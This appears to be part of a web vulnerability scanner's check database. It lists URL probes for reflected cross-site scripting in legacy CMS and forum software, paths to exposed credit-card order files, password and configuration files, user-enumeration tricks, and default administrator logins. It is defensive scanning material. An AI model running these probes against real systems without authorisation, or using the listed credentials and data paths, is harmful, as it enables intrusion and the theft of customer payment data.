"000844","0","4","/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000845","0","4","/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000846","0","4","/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000847","5498","4","/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000848","0","4","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000849","0","4","/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000850","0","4","/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000851","0","4","/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000852","0","4","/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0","GET","javascript:alert\(9456\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000853","20235","4","/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000854","5506","4","/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|","GET","<script>alert\(document\.cookie\)","","","","","PostNuke CMS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000855","0","4","/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000856","0","4","/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000857","0","4","/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000858","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000859","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000860","5914","4","/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000861","0","4","/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000862","0","4","/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index","GET","javascript:alert\(document\.cookie\);","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000863","4598","4","/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22","GET","alert\('Vulnerable'\)","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000864","3201","4","/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000865","0","4","/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000866","0","4","/mailman/listinfo/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.","",""
"000867","2895","4","/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.","",""
"000868","9256","4","/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","",""
"000869","9257","4","/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","",""
"000870","4015","4","/jigsaw/","GET","200","","","","","Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.","",""
"000872","5803","4","/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000873","2739","4","/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; ","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000874","50552","4","/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000875","0","4","/index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000876","0","4","/index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","",""
"000877","0","4","/index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000878","0","4","/index.php/\"><script><script>alert(document.cookie)</script><","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""
"000879","50553","4","/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""
"000880","50553","4","/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""
"000881","17160","4","/include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHPKIT is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000882","0","4","/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000883","0","4","/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000884","0","4","/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000885","2754","4","/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E","GET","200","","","","","MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.","",""
"000886","2322","4","/gallery/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""
"000887","20234","4","/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
"000888","2946","4","/forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22","GET","alert\(9823\)","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000889","2739","4","/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; ","GET","<script>alert\(document\.cookie\)<script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000890","31694","4","/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.","",""
"000891","5043","4","/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000892","2530","4","/esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000893","9231","4","/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.","",""
"000894","59095","4","/downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000895","59095","4","/downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000896","59095","4","/downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000897","0","4","/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
"000898","0","4","/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000899","0","4","/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000900","5043","4","/comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000901","0","4","/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
"000902","50619","4","/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000903","50619","4","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000904","0","4","/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000905","651","4","/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000906","651","4","/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000907","42015","4","@CGIDIRStest2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000908","2257","4","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","GET","alert\(\"alert\"\)","","","","","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000909","7022","4","/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05","GET","<script>alert\(document\.cookie\);<\/script>","","","","","DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). CA-2000-02.","",""
"000910","27096","4","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000911","27097","4","/ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000912","27095","4","/bb000001.pl<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000913","3850","4","/article.php?sid=\"><Img Src=javascript:alert('Vulnerable')><Img Src=\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000914","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000915","4765","4","/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000916","0","4","/anthill/login.php","GET","200","","","","","Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02","",""
"000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ",""
"000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""
"000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""
"000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000924","0","4","/<script>alert('Vulnerable')</script>.thtml","GET","<script>alert\('Vulnerable'\)<\/script>\.thtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000925","0","4","/<script>alert('Vulnerable')</script>.shtml","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000926","0","4","/<script>alert('Vulnerable')</script>.jsp","GET","<script>alert\('Vulnerable'\)<\/script>\.jsp","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000927","0","4","/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.","",""
"000928","59443","4","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000929","59442","4","//comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000930","0","4","/&lt;script&gt;alert('Vulnerable');&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests. CA-2000-02.","",""
"000931","0","4","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.","",""
"000932","0","4","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""
"000933","0","4","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""
"000934","0","4","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","",""
"000935","9209","4","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000936","19772","4","@CGIDIRStitle.cgi","GET","200","","","","","HNS's title.cgi is vulnerable to Cross Site Scripting (XSS CA-2000-02) in version 2.00 and earlier, and Lite 0.8 and earlier.","",""
"000937","21365","34","@CGIDIRScompatible.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000938","0","34","/add_user.php","GET","output started at \/","","","","","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000939","0","1","@CGIDIRSprobecontrol.cgi?command=enable&username=cancer&password=killer","GET","200","","","","","This might be interesting... has been seen in web logs from a scanner.","",""
"000940","0","1","@CGIDIRSretrieve_password.pl","GET","200","","","","","May not be vulnerable, but see http://www.dcscripts.com/bugtrac/DCForumID7/3.html for information.","",""
"000941","0","1","@CGIDIRSwwwadmin.pl","GET","200","","","","","Administration CGI?","",""
"000942","0","1","/cfdocs/expeval/displayopenedfile.cfm","GET","200","","not found","","","Unknown vuln","",""
"000943","0","1","/cfdocs/expeval/sendmail.cfm","GET","200","","","","","Can be used to send email; go to the page and fill in the form","",""
"000944","22","1ab","/cgi-bin/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","",""
"000945","0","1b","@CGIDIRSwebmap.cgi","GET","200","","","","","nmap front end... could be fun","",""
"000946","0","1b","@CGIDIRSwwwwais","GET","UNISYS WEB SEARCH ENGINE","","","","","Unisys web server wais search found.","",""
"000947","0","1b","/ammerum/","GET","200","","","","","Ammerum pre 0.6-1 had several security issues.","",""
"000948","0","1b","/ariadne/","GET","200","","","","","Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.","",""
"000949","0","1b","/cbms/cbmsfoot.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000950","0","1b","/cbms/changepass.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000951","0","1b","/cbms/editclient.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000952","0","1b","/cbms/passgen.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000953","0","1b","/cbms/realinv.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000954","0","1b","/cbms/usersetup.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","",""
"000955","0","1b","@CGIDIRSadmin/admin.cgi","GET","200","","","","","May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.","",""
"000956","0","1b","@CGIDIRSadmin/setup.cgi","GET","200","","","","","May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.","",""
"000957","0","2","@CGIDIRSmt-static/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","",""
"000958","0","2","@CGIDIRSmt-static/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","",""
"000959","0","2","@CGIDIRSmt/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","",""
"000960","0","2","@CGIDIRSmt/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","",""
"000961","143","2","/cgi-bin-sdb/printenv","GET","\/usr\/bin\/perl","","","","","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.","",""
"000962","0","12","/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C","GET","200","","","","","This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm","",""
"000963","59412","23","/db/users.dat","GET","200","","","","","upb PB allows the user database to be retrieved remotely.","",""
"000964","0","3","@CGIDIRScgiwrap/~@USERS","GET","UID of script userid","","","","","cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","",""
"000965","0","3","@CGIDIRScgiwrap/~JUNK(5)","GET"," unable to find the user","","","","","Based on error message, cgiwrap can likely be used to find valid user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","",""
"000966","0","3","@CGIDIRScgiwrap/~root","GET","UID of script userid","","","","","cgiwrap can be used to enumerate user accounts.  Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","",""
"000967","0","3","@CGIDIRSdbman/db.cgi?db=no-db","GET","200","","","","","This CGI allows remote attackers to view system information.","",""
"000968","17111","3","@CGIDIRSdcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000969","17111","3","@CGIDIRSDCShop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000970","596","3","@CGIDIRSdcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000971","596","3","@CGIDIRSDCShop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000972","0","3","@CGIDIRSdumpenv.pl","GET","200","","","","","This CGI gives a lot of information to attackers.","",""
"000973","89","3","@CGIDIRShtsearch?-c/nonexistant","GET","Unable to read configuration file '\/nonexistant'","","","","","The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.","",""
"000974","0","3","@CGIDIRSmkilog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","",""
"000975","0","3","@CGIDIRSmkplog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","",""
"000976","596","3","@CGIDIRSorders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000977","0","3","@CGIDIRSprocessit.pl","GET","200","","","","","This CGI returns environment variables, giving attackers valuable information.","",""
"000978","0","3","@CGIDIRSrpm_query","GET","200","","","","","This CGI allows anyone to see the installed RPMs","",""
"000979","0","3","@CGIDIRSsawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3","GET","Unknown configuration","","","","","The Sawmill CGI allows attackers to read the Sawmill password.","",""
"000980","17111","3","@CGIDIRSshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000981","596","3","@CGIDIRSshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000982","0","3","@CGIDIRSws_ftp.ini","GET","200","","","","","Can contain saved passwords for ftp sites","",""
